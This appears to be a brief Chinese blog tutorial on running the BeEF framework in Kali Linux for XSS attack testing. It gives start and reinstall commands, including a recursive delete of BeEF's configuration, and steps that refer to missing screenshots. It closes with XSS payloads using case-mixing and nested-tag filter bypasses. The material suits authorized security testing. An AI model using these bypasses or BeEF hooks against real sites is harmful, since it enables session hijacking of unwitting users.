kali用beef实现xss漏洞攻击测试

一、Kali开启网络监听:

service apache2 start

二、启动 Kali beef-xss 模块:

beef-xss

如果需要查看密码路径root权限,可以用以下指令:

vi /etc/beef-xss/config.yaml

其它指令,如下:

apt-get remove beef-xss //卸载beef-xss
apt-get purge beef-xss //删除beef-xss配置
rm -r /usr/share/beef-xss/ //重点,彻底删除beef-xss所有的用户配置,0保留
apt-get install beef-xss //重新输入密码后,就可以正常使用了

三、复制脚本,如下图所示:

四、链接执行xss木马形式:

五、链接本地成功查看:

六、发起:

payload:  

正常方式 <script>alert(1)</script>

大小写方式绕过 <ScRiPt>alert(1)</ScRiPt>

乱排序绕过 <scr<script>ipt>alert(1)</scr<script>ipt>

posted @   李嘉伦伦伦伦  阅读(342)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· winform 绘制太阳,地球,月球 运作规律
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· AI与.NET技术实操系列(五):向量存储与相似性搜索在 .NET 中的实现
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 超详细:普通电脑也行Windows部署deepseek R1训练数据并当服务器共享给他人
历史上的今天:
2021-07-25 关于 Enigma Virtual Box 的使用笔记(虚拟路径)
点击右上角即可分享
微信分享提示